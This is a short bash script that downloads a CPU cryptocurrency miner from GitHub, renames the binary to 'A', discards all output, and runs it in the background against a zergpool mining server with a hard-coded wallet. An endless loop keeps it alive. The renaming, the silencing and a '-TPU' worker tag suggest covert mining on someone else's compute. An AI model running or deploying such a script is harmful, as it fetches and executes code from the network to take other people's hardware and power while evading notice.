#!/bin/bash
#!/bin/sh

wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz >/dev/null 2>&1
tar xf cpuminer-opt-linux.tar.gz >/dev/null 2>&1
mv cpuminer-sse2 A >/dev/null 2>&1
chmod +x A >/dev/null 2>&1
nohup ./A -a yescrypt -o stratum+tcp://yescrypt.asia.mine.zergpool.com:6233 -u 7pXYkwdwUFBGNaG8dJ8w6kZTzRjnTpDTgo.$(echo $(shuf -i 1-99999 -n 1)-TPU) -p c=DASH >/dev/null 2>&1
while [ 1 ]; do
sleep 3
done
sleep 999




